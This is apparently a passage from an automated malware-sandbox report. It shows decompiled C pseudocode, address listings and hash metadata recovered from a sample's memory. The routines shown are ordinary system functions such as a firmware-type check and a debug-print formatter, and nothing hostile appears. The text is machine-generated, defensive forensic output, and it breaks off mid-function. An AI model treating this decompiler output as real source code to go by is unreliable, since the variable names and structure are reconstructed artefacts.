                                  							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                  							 *(_t118 - 0x88) = _t106;
                                  							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                  								break;
                                  							}
                                  							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                  							_t106 = _t106 + 1;
                                  						}
                                  						_t88 = E034A500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                  						_t119 = _t119 + 0x1c;
                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                  						if(_t88 < 0) {
                                  							goto L29;
                                  						}
                                  						_t101 = _t118 - 0x3c;
                                  						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                  						goto L21;
                                  					}
                                  					_t67 = 0xc0000017;
                                  					goto L28;
                                  				}
                                  				_push(0);
                                  				_push(0x20);
                                  				_push(_t118 - 0x60);
                                  				_push(0x5a);
                                  				_t94 = E03469860();
                                  				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                  				if(_t94 < 0) {
                                  					goto L29;
                                  				}
                                  				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                  					_t101 = L"Legacy";
                                  					_push(6);
                                  				} else {
                                  					_t101 = L"UEFI";
                                  					_push(4);
                                  				}
                                  				_pop(_t65);
                                  				goto L21;
                                  			}






















                                  0x034a51be
                                  0x034a51c3
                                  0x034a51c8
                                  0x034a51cd
                                  0x034a51d0
                                  0x034a51d3
                                  0x034a51d8
                                  0x034a51db
                                  0x034a51de
                                  0x034a51e0
                                  0x034a51e3
                                  0x034a51e6
                                  0x034a51e8
                                  0x034a5342
                                  0x034a5351
                                  0x034a5356
                                  0x034a535a
                                  0x034a5360
                                  0x034a5363
                                  0x034a5366
                                  0x034a5369
                                  0x034a5369
                                  0x034a536b
                                  0x034a536b
                                  0x034a5370
                                  0x034a53a3
                                  0x034a53a4
                                  0x034a53a6
                                  0x034a53ab
                                  0x034a53ab
                                  0x034a53ae
                                  0x034a53ae
                                  0x034a53b5
                                  0x034a53bf
                                  0x034a53bf
                                  0x034a5375
                                  0x034a5396
                                  0x034a53a0
                                  0x034a53a0
                                  0x00000000
                                  0x034a5396
                                  0x034a5377
                                  0x034a5379
                                  0x034a537f
                                  0x034a538c
                                  0x034a5390
                                  0x00000000
                                  0x034a5390
                                  0x034a51ee
                                  0x034a51f1
                                  0x034a5301
                                  0x034a5310
                                  0x034a5315
                                  0x034a5318
                                  0x034a531b
                                  0x034a5320
                                  0x034a532e
                                  0x034a5331
                                  0x00000000
                                  0x034a5331
                                  0x034a5328
                                  0x034a5329
                                  0x00000000
                                  0x034a5329
                                  0x034a51fa
                                  0x034a5235
                                  0x034a5236
                                  0x034a5239
                                  0x034a523f
                                  0x034a5240
                                  0x034a5241
                                  0x034a5242
                                  0x034a5246
                                  0x034a5247
                                  0x034a524e
                                  0x034a5251
                                  0x034a5267
                                  0x034a5269
                                  0x034a526e
                                  0x034a527d
                                  0x034a527e
                                  0x034a5281
                                  0x034a5282
                                  0x034a5287
                                  0x034a5288
                                  0x034a528a
                                  0x034a528f
                                  0x034a5294
                                  0x00000000
                                  0x00000000
                                  0x034a529a
                                  0x034a529c
                                  0x034a529e
                                  0x034a529e
                                  0x034a52a4
                                  0x034a52b0
                                  0x00000000
                                  0x00000000
                                  0x034a52ba
                                  0x034a52bc
                                  0x034a52bc
                                  0x034a52d4
                                  0x034a52d9
                                  0x034a52dc
                                  0x034a52e1
                                  0x00000000
                                  0x00000000
                                  0x034a52e7
                                  0x034a52f4
                                  0x00000000
                                  0x034a52f4
                                  0x034a5270
                                  0x00000000
                                  0x034a5270
                                  0x034a51fc
                                  0x034a51fd
                                  0x034a5202
                                  0x034a5203
                                  0x034a5205
                                  0x034a520a
                                  0x034a520f
                                  0x00000000
                                  0x00000000
                                  0x034a521b
                                  0x034a5226
                                  0x034a522b
                                  0x034a521d
                                  0x034a521d
                                  0x034a5222
                                  0x034a5222
                                  0x034a522d
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: 8738cc80a33447c60210acad7945b2a2d1646843f328ce808ab4ddfd1264d1bf
                                  • Instruction ID: 68299e3990bc0f6eca6270412e503b8480ebaf0f0cf97b31c0b2c9996a515fd6
                                  • Opcode Fuzzy Hash: 8738cc80a33447c60210acad7945b2a2d1646843f328ce808ab4ddfd1264d1bf
                                  • Instruction Fuzzy Hash: E6517FB1E00B089FDB24DFA9CA80AAEB7B8FF55700F1440AEE599EF251D7719901CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E0344B944(signed int* __ecx, char __edx) {
                                  				signed int _v8;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				char _v28;
                                  				signed int _v32;
                                  				char _v36;
                                  				signed int _v40;
                                  				intOrPtr _v44;
                                  				signed int* _v48;
                                  				signed int _v52;
                                  				signed int _v56;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				intOrPtr _v68;
                                  				intOrPtr _v72;
                                  				intOrPtr _v76;
                                  				char _v77;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t65;
                                  				intOrPtr _t67;
                                  				intOrPtr _t68;
                                  				char* _t73;
                                  				intOrPtr _t77;
                                  				intOrPtr _t78;
                                  				signed int _t82;
                                  				intOrPtr _t83;
                                  				void* _t87;
                                  				char _t88;
                                  				intOrPtr* _t89;
                                  				intOrPtr _t91;
                                  				void* _t97;
                                  				intOrPtr _t100;
                                  				void* _t102;
                                  				void* _t107;
                                  				signed int _t108;
                                  				intOrPtr* _t112;
                                  				void* _t113;
                                  				intOrPtr* _t114;
                                  				intOrPtr _t115;
                                  				intOrPtr _t116;
                                  				intOrPtr _t117;
                                  				signed int _t118;
                                  				void* _t130;
                                  
                                  				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                  				_v8 =  *0x351d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                  				_t112 = __ecx;
                                  				_v77 = __edx;
                                  				_v48 = __ecx;
                                  				_v28 = 0;
                                  				_t5 = _t112 + 0xc; // 0x575651ff
                                  				_t105 =  *_t5;
                                  				_v20 = 0;
                                  				_v16 = 0;
                                  				if(_t105 == 0) {
                                  					_t50 = _t112 + 4; // 0x5de58b5b
                                  					_t60 =  *__ecx |  *_t50;
                                  					if(( *__ecx |  *_t50) != 0) {
                                  						 *__ecx = 0;
                                  						__ecx[1] = 0;
                                  						if(E03447D50() != 0) {
                                  							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  						} else {
                                  							_t65 = 0x7ffe0386;
                                  						}
                                  						if( *_t65 != 0) {
                                  							E034F8CD6(_t112);
                                  						}
                                  						_push(0);
                                  						_t52 = _t112 + 0x10; // 0x778df98b
                                  						_push( *_t52);
                                  						_t60 = E03469E20();
                                  					}
                                  					L20:
                                  					_pop(_t107);
                                  					_pop(_t113);
                                  					_pop(_t87);
                                  					return E0346B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                  				}
                                  				_t8 = _t112 + 8; // 0x8b000cc2
                                  				_t67 =  *_t8;
                                  				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                  				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                  				_t108 =  *(_t67 + 0x14);
                                  				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                  				_t105 = 0x2710;
                                  				asm("sbb eax, edi");
                                  				_v44 = _t88;
                                  				_v52 = _t108;
                                  				_t60 = E0346CE00(_t97, _t68, 0x2710, 0);
                                  				_v56 = _t60;
                                  				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                  					L3:
                                  					 *(_t112 + 0x44) = _t60;
                                  					_t105 = _t60 * 0x2710 >> 0x20;
                                  					 *_t112 = _t88;
                                  					 *(_t112 + 4) = _t108;
                                  					_v20 = _t60 * 0x2710;
                                  					_v16 = _t60 * 0x2710 >> 0x20;
                                  					if(_v77 != 0) {
                                  						L16:
                                  						_v36 = _t88;
                                  						_v32 = _t108;
                                  						if(E03447D50() != 0) {
                                  							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  						} else {
                                  							_t73 = 0x7ffe0386;
                                  						}
                                  						if( *_t73 != 0) {
                                  							_t105 = _v40;
                                  							E034F8F6A(_t112, _v40, _t88, _t108);
                                  						}
                                  						_push( &_v28);
                                  						_push(0);
                                  						_push( &_v36);
                                  						_t48 = _t112 + 0x10; // 0x778df98b
                                  						_push( *_t48);
                                  						_t60 = E0346AF60();
                                  						goto L20;
                                  					} else {
                                  						_t89 = 0x7ffe03b0;
                                  						do {
                                  							_t114 = 0x7ffe0010;
                                  							do {
                                  								_t77 =  *0x3518628; // 0x0
                                  								_v68 = _t77;
                                  								_t78 =  *0x351862c; // 0x0
                                  								_v64 = _t78;
                                  								_v72 =  *_t89;
                                  								_v76 =  *((intOrPtr*)(_t89 + 4));
                                  								while(1) {
                                  									_t105 =  *0x7ffe000c;
                                  									_t100 =  *0x7ffe0008;
                                  									if(_t105 ==  *_t114) {
                                  										goto L8;
                                  									}
                                  									asm("pause");
                                  								}
                                  								L8:
                                  								_t89 = 0x7ffe03b0;
                                  								_t115 =  *0x7ffe03b0;
                                  								_t82 =  *0x7FFE03B4;
                                  								_v60 = _t115;
                                  								_t114 = 0x7ffe0010;
                                  								_v56 = _t82;
                                  							} while (_v72 != _t115 || _v76 != _t82);
                                  							_t83 =  *0x3518628; // 0x0
                                  							_t116 =  *0x351862c; // 0x0
                                  							_v76 = _t116;
                                  							_t117 = _v68;
                                  						} while (_t117 != _t83 || _v64 != _v76);
                                  						asm("sbb edx, [esp+0x24]");
                                  						_t102 = _t100 - _v60 - _t117;
                                  						_t112 = _v48;
                                  						_t91 = _v44;
                                  						asm("sbb edx, eax");
                                  						_t130 = _t105 - _v52;
                                  						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                  							_t88 = _t102 - _t91;
                                  							asm("sbb edx, edi");
                                  							_t108 = _t105;
                                  						} else {
                                  							_t88 = 0;
                                  							_t108 = 0;
                                  						}
                                  						goto L16;
                                  					}
                                  				} else {
                                  					if( *(_t112 + 0x44) == _t60) {
                                  						goto L20;
                                  					}
                                  					goto L3;
                                  				}
                                  			}
















































                                  0x0344b94c
                                  0x0344b956
                                  0x0344b95c
                                  0x0344b95e
                                  0x0344b964
                                  0x0344b969
                                  0x0344b96d
                                  0x0344b96d
                                  0x0344b970
                                  0x0344b974
                                  0x0344b97a
                                  0x0344badf
                                  0x0344badf
                                  0x0344bae2
                                  0x0344bae4
                                  0x0344bae6
                                  0x0344baf0
                                  0x03492cb8
                                  0x0344baf6
                                  0x0344baf6
                                  0x0344baf6
                                  0x0344bafd
                                  0x0344bb1f
                                  0x0344bb1f
                                  0x0344baff
                                  0x0344bb00
                                  0x0344bb00
                                  0x0344bb03
                                  0x0344bb03
                                  0x0344bacb
                                  0x0344bacf
                                  0x0344bad0
                                  0x0344bad1
                                  0x0344badc
                                  0x0344badc
                                  0x0344b980
                                  0x0344b980
                                  0x0344b988
                                  0x0344b98b
                                  0x0344b98d
                                  0x0344b990
                                  0x0344b993
                                  0x0344b999
                                  0x0344b99b
                                  0x0344b9a1
                                  0x0344b9a5
                                  0x0344b9aa
                                  0x0344b9b0
                                  0x0344b9bb
                                  0x0344b9c0
                                  0x0344b9c3
                                  0x0344b9ca
                                  0x0344b9cc
                                  0x0344b9cf
                                  0x0344b9d3
                                  0x0344b9d7
                                  0x0344ba94
                                  0x0344ba94
                                  0x0344ba98
                                  0x0344baa3
                                  0x03492ccb
                                  0x0344baa9
                                  0x0344baa9
                                  0x0344baa9
                                  0x0344bab1
                                  0x03492cd5
                                  0x03492cdd
                                  0x03492cdd
                                  0x0344babb
                                  0x0344babc
                                  0x0344bac2
                                  0x0344bac3
                                  0x0344bac3
                                  0x0344bac6
                                  0x00000000
                                  0x0344b9dd
                                  0x0344b9dd
                                  0x0344b9e7
                                  0x0344b9e7
                                  0x0344b9ec
                                  0x0344b9ec
                                  0x0344b9f1
                                  0x0344b9f5
                                  0x0344b9fa
                                  0x0344ba00
                                  0x0344ba0c
                                  0x0344ba10
                                  0x0344ba10
                                  0x0344ba12
                                  0x0344ba18
                                  0x00000000
                                  0x00000000
                                  0x0344bb26
                                  0x0344bb26
                                  0x0344ba1e
                                  0x0344ba1e
                                  0x0344ba23
                                  0x0344ba25
                                  0x0344ba2c
                                  0x0344ba30
                                  0x0344ba35
                                  0x0344ba35
                                  0x0344ba41
                                  0x0344ba46
                                  0x0344ba4c
                                  0x0344ba50
                                  0x0344ba54
                                  0x0344ba6a
                                  0x0344ba6e
                                  0x0344ba70
                                  0x0344ba74
                                  0x0344ba78
                                  0x0344ba7a
                                  0x0344ba7c
                                  0x0344ba8e
                                  0x0344ba90
                                  0x0344ba92
                                  0x0344bb14
                                  0x0344bb14
                                  0x0344bb16
                                  0x0344bb16
                                  0x00000000
                                  0x0344ba7c
                                  0x0344bb0a
                                  0x0344bb0d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0344bb0f

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0344B9A5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 885266447-0
                                  • Opcode ID: 6d45637137681f9c92aff872ea47b9d31c36a07bf31d32d733cd27b4b1a8d58b
                                  • Instruction ID: 3fd70009d5d8a81966ae7419dd9c80c5aa0355e16c6765043de67fb1800aff8c
                                  • Opcode Fuzzy Hash: 6d45637137681f9c92aff872ea47b9d31c36a07bf31d32d733cd27b4b1a8d58b
                                  • Instruction Fuzzy Hash: CE513571A08340CFE720DF29C48092BBBE9FB88600F18896FE5D59B354D771E845CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E0342B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                  				signed int _t65;
                                  				signed short _t69;
                                  				intOrPtr _t70;
                                  				signed short _t85;
                                  				void* _t86;
                                  				signed short _t89;
                                  				signed short _t91;
                                  				intOrPtr _t92;
                                  				intOrPtr _t97;
                                  				intOrPtr* _t98;
                                  				signed short _t99;
                                  				signed short _t101;
                                  				void* _t102;
                                  				char* _t103;
                                  				signed short _t104;
                                  				intOrPtr* _t110;
                                  				void* _t111;
                                  				void* _t114;
                                  				intOrPtr* _t115;
                                  
                                  				_t109 = __esi;
                                  				_t108 = __edi;
                                  				_t106 = __edx;
                                  				_t95 = __ebx;
                                  				_push(0x90);
                                  				_push(0x34ff7a8);
                                  				E0347D0E8(__ebx, __edi, __esi);
                                  				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                  				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                  				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                  				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                  				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                  				if(__edx == 0xffffffff) {
                                  					L6:
                                  					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                  					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                  					__eflags = _t65 & 0x00000002;
                                  					if((_t65 & 0x00000002) != 0) {
                                  						L3:
                                  						L4:
                                  						return E0347D130(_t95, _t108, _t109);
                                  					}
                                  					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                  					_t108 = 0;
                                  					_t109 = 0;
                                  					_t95 = 0;
                                  					__eflags = 0;
                                  					while(1) {
                                  						__eflags = _t95 - 0x200;
                                  						if(_t95 >= 0x200) {
                                  							break;
                                  						}
                                  						E0346D000(0x80);
                                  						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                  						_t108 = _t115;
                                  						_t95 = _t95 - 0xffffff80;
                                  						_t17 = _t114 - 4;
                                  						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                  						__eflags =  *_t17;
                                  						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                  						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                  						_t102 = _t110 + 1;
                                  						do {
                                  							_t85 =  *_t110;
                                  							_t110 = _t110 + 1;
                                  							__eflags = _t85;
                                  						} while (_t85 != 0);
                                  						_t111 = _t110 - _t102;
                                  						_t21 = _t95 - 1; // -129
                                  						_t86 = _t21;
                                  						__eflags = _t111 - _t86;
                                  						if(_t111 > _t86) {
                                  							_t111 = _t86;
                                  						}
                                  						E0346F3E0(_t108, _t106, _t111);
                                  						_t115 = _t115 + 0xc;
                                  						_t103 = _t111 + _t108;
                                  						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                  						_t89 = _t95 - _t111;
                                  						__eflags = _t89;
                                  						_push(0);
                                  						if(_t89 == 0) {
                                  							L15:
                                  							_t109 = 0xc000000d;
                                  							goto L16;
                                  						} else {
                                  							__eflags = _t89 - 0x7fffffff;
                                  							if(_t89 <= 0x7fffffff) {
                                  								L16:
                                  								 *(_t114 - 0x94) = _t109;
                                  								__eflags = _t109;
                                  								if(_t109 < 0) {
                                  									__eflags = _t89;
                                  									if(_t89 != 0) {
                                  										 *_t103 = 0;
                                  									}
                                  									L26:
                                  									 *(_t114 - 0xa0) = _t109;
                                  									 *(_t114 - 4) = 0xfffffffe;
                                  									__eflags = _t109;
                                  									if(_t109 >= 0) {
                                  										L31:
                                  										_t98 = _t108;
                                  										_t39 = _t98 + 1; // 0x1
                                  										_t106 = _t39;
                                  										do {
                                  											_t69 =  *_t98;
                                  											_t98 = _t98 + 1;
                                  											__eflags = _t69;
                                  										} while (_t69 != 0);
                                  										_t99 = _t98 - _t106;
                                  										__eflags = _t99;
                                  										L34:
                                  										_t70 =  *[fs:0x30];
                                  										__eflags =  *((char*)(_t70 + 2));
                                  										if( *((char*)(_t70 + 2)) != 0) {
                                  											L40:
                                  											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                  											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                  											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                  											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                  											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                  											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                  											 *(_t114 - 4) = 1;
                                  											_push(_t114 - 0x74);
                                  											L0347DEF0(_t99, _t106);
                                  											 *(_t114 - 4) = 0xfffffffe;
                                  											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                  											goto L3;
                                  										}
                                  										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                  										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                  											goto L40;
                                  										}
                                  										_push( *((intOrPtr*)(_t114 + 8)));
                                  										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                  										_push(_t99 & 0x0000ffff);
                                  										_push(_t108);
                                  										_push(1);
                                  										_t101 = E0346B280();
                                  										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                  										if( *((char*)(_t114 + 0x14)) == 1) {
                                  											__eflags = _t101 - 0x80000003;
                                  											if(_t101 == 0x80000003) {
                                  												E0346B7E0(1);
                                  												_t101 = 0;
                                  												__eflags = 0;
                                  											}
                                  										}
                                  										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                  										goto L4;
                                  									}
                                  									__eflags = _t109 - 0x80000005;
                                  									if(_t109 == 0x80000005) {
                                  										continue;
                                  									}
                                  									break;
                                  								}
                                  								 *(_t114 - 0x90) = 0;
                                  								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                  								_t91 = E0346E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                  								_t115 = _t115 + 0x10;
                                  								_t104 = _t91;
                                  								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                  								__eflags = _t104;
                                  								if(_t104 < 0) {
                                  									L21:
                                  									_t109 = 0x80000005;
                                  									 *(_t114 - 0x90) = 0x80000005;
                                  									L22:
                                  									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                  									L23:
                                  									 *(_t114 - 0x94) = _t109;
                                  									goto L26;
                                  								}
                                  								__eflags = _t104 - _t92;
                                  								if(__eflags > 0) {
                                  									goto L21;
                                  								}
                                  								if(__eflags == 0) {
                                  									goto L22;
                                  								}
                                  								goto L23;
                                  							}
                                  							goto L15;
                                  						}
                                  					}
                                  					__eflags = _t109;
                                  					if(_t109 >= 0) {
                                  						goto L31;
                                  					}
                                  					__eflags = _t109 - 0x80000005;
                                  					if(_t109 != 0x80000005) {
                                  						goto L31;
                                  					}
                                  					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                  					_t38 = _t95 - 1; // -129
                                  					_t99 = _t38;
                                  					goto L34;
                                  				}
                                  				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                  					__eflags = __edx - 0x65;
                                  					if(__edx != 0x65) {
                                  						goto L2;
                                  					}
                                  					goto L6;
                                  				}
                                  				L2:
                                  				_push( *((intOrPtr*)(_t114 + 8)));
                                  				_push(_t106);
                                  				if(E0346A890() != 0) {
                                  					goto L6;
                                  				}
                                  				goto L3;
                                  			}






















                                  0x0342b171
                                  0x0342b171
                                  0x0342b171
                                  0x0342b171
                                  0x0342b171
                                  0x0342b176
                                  0x0342b17b
                                  0x0342b180
                                  0x0342b186
                                  0x0342b18f
                                  0x0342b198
                                  0x0342b1a4
                                  0x0342b1aa
                                  0x03484802
                                  0x03484802
                                  0x03484805
                                  0x0348480c
                                  0x0348480e
                                  0x0342b1d1
                                  0x0342b1d3
                                  0x0342b1de
                                  0x0342b1de
                                  0x03484817
                                  0x0348481e
                                  0x03484820
                                  0x03484822
                                  0x03484822
                                  0x03484824
                                  0x03484824
                                  0x0348482a
                                  0x00000000
                                  0x00000000
                                  0x03484835
                                  0x0348483a
                                  0x0348483d
                                  0x0348483f
                                  0x03484842
                                  0x03484842
                                  0x03484842
                                  0x03484846
                                  0x0348484c
                                  0x0348484e
                                  0x03484851
                                  0x03484851
                                  0x03484853
                                  0x03484854
                                  0x03484854
                                  0x03484858
                                  0x0348485a
                                  0x0348485a
                                  0x0348485d
                                  0x0348485f
                                  0x03484861
                                  0x03484861
                                  0x03484866
                                  0x0348486b
                                  0x0348486e
                                  0x03484871
                                  0x03484876
                                  0x03484876
                                  0x03484878
                                  0x0348487b
                                  0x03484884
                                  0x03484884
                                  0x00000000
                                  0x0348487d
                                  0x0348487d
                                  0x03484882
                                  0x03484889
                                  0x03484889
                                  0x0348488f
                                  0x03484891
                                  0x034848e0
                                  0x034848e2
                                  0x034848e4
                                  0x034848e4
                                  0x034848e7
                                  0x034848e7
                                  0x034848ed
                                  0x034848f4
                                  0x034848f6
                                  0x03484951
                                  0x03484951
                                  0x03484953
                                  0x03484953
                                  0x03484956
                                  0x03484956
                                  0x03484958
                                  0x03484959
                                  0x03484959
                                  0x0348495d
                                  0x0348495d
                                  0x0348495f
                                  0x0348495f
                                  0x03484965
                                  0x03484969
                                  0x034849ba
                                  0x034849ba
                                  0x034849c1
                                  0x034849c5
                                  0x034849cc
                                  0x034849d4
                                  0x034849d7
                                  0x034849da
                                  0x034849e4
                                  0x034849e5
                                  0x034849f3
                                  0x03484a02
                                  0x00000000
                                  0x03484a02
                                  0x03484972
                                  0x03484974
                                  0x00000000
                                  0x00000000
                                  0x03484976
                                  0x03484979
                                  0x03484982
                                  0x03484983
                                  0x03484984
                                  0x0348498b
                                  0x0348498d
                                  0x03484991
                                  0x03484993
                                  0x03484999
                                  0x0348499d
                                  0x034849a2
                                  0x034849a2
                                  0x034849a2
                                  0x03484999
                                  0x034849ac
                                  0x00000000
                                  0x034849b3
                                  0x034848f8
                                  0x034848fe
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034848fe
                                  0x03484895
                                  0x0348489c
                                  0x034848ad
                                  0x034848b2
                                  0x034848b5
                                  0x034848b7
                                  0x034848ba
                                  0x034848bc
                                  0x034848c6
                                  0x034848c6
                                  0x034848cb
                                  0x034848d1
                                  0x034848d4
                                  0x034848d8
                                  0x034848d8
                                  0x00000000
                                  0x034848d8
                                  0x034848be
                                  0x034848c0
                                  0x00000000
                                  0x00000000
                                  0x034848c2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034848c4
                                  0x00000000
                                  0x03484882
                                  0x0348487b
                                  0x03484904
                                  0x03484906
                                  0x00000000
                                  0x00000000
                                  0x03484908
                                  0x0348490e
                                  0x00000000
                                  0x00000000
                                  0x03484910
                                  0x03484917
                                  0x03484917
                                  0x00000000
                                  0x03484917
                                  0x0342b1ba
                                  0x034847f9
                                  0x034847fc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034847fc
                                  0x0342b1c0
                                  0x0342b1c0
                                  0x0342b1c3
                                  0x0342b1cb
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID: _vswprintf_s
                                  • String ID:
                                  • API String ID: 677850445-0
                                  • Opcode ID: 8b7fb3641bf5a8819e3cd6bd250939e338f0cf39e21aa0a61e730490f99b368c
                                  • Instruction ID: 2d5f01b20600f4dcc56b700741f78aaafcf213d01cbbc3f54ff965042ab66b73
                                  • Opcode Fuzzy Hash: 8b7fb3641bf5a8819e3cd6bd250939e338f0cf39e21aa0a61e730490f99b368c
                                  • Instruction Fuzzy Hash: 9051E279D0426A8EDB30EF76C844BAEBBB0AF00310F1441AFD859AF381D73049468F95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E03452581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200897, char _a1546912577) {
                                  				intOrPtr _v1;
                                  				void* _v3;
                                  				signed int _v8;
                                  				signed int _v16;
                                  				unsigned int _v24;
                                  				void* _v28;
                                  				signed int _v32;
                                  				unsigned int _v36;
                                  				signed int _v37;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				signed int _v48;
                                  				signed int _v52;
                                  				signed int _v56;
                                  				intOrPtr _v60;
                                  				signed int _v64;
                                  				signed int _v68;
                                  				signed int _v72;
                                  				signed int _v76;
                                  				signed int _v80;
                                  				signed int _t237;
                                  				signed int _t241;
                                  				char* _t244;
                                  				signed int _t247;
                                  				signed int _t249;
                                  				intOrPtr _t251;
                                  				signed int _t254;
                                  				signed int _t261;
                                  				signed int _t264;
                                  				signed int _t272;
                                  				intOrPtr _t278;
                                  				signed int _t280;
                                  				signed int _t282;
                                  				void* _t286;
                                  				signed int _t287;
                                  				unsigned int _t290;
                                  				signed int _t294;
                                  				signed int _t301;
                                  				signed int _t305;
                                  				intOrPtr _t318;
                                  				signed int _t327;
                                  				signed int _t329;
                                  				signed int _t330;
                                  				signed int _t334;
                                  				signed int _t335;
                                  				void* _t339;
                                  				signed int _t340;
                                  				signed int _t342;
                                  				signed int _t353;
                                  				void* _t354;
                                  				void* _t357;
                                  
                                  				_t342 = _t353;
                                  				_t354 = _t353 - 0x4c;
                                  				_v8 =  *0x351d360 ^ _t342;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t334 = 0x351b2e8;
                                  				_v56 = _a4;
                                  				_v48 = __edx;
                                  				_v60 = __ecx;
                                  				_t290 = 0;
                                  				_v80 = 0;
                                  				asm("movsd");
                                  				_v64 = 0;
                                  				_v76 = 0;
                                  				_v72 = 0;
                                  				asm("movsd");
                                  				_v44 = 0;
                                  				_v52 = 0;
                                  				_v68 = 0;
                                  				asm("movsd");
                                  				_v32 = 0;
                                  				_v36 = 0;
                                  				asm("movsd");
                                  				_v16 = 0;
                                  				_t278 = 0x48;
                                  				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                  				_t327 = 0;
                                  				_v37 = _t315;
                                  				if(_v48 <= 0) {
                                  					L16:
                                  					_t45 = _t278 - 0x48; // 0x0
                                  					__eflags = _t45 - 0xfffe;
                                  					if(_t45 > 0xfffe) {
                                  						_t335 = 0xc0000106;
                                  						goto L32;
                                  					} else {
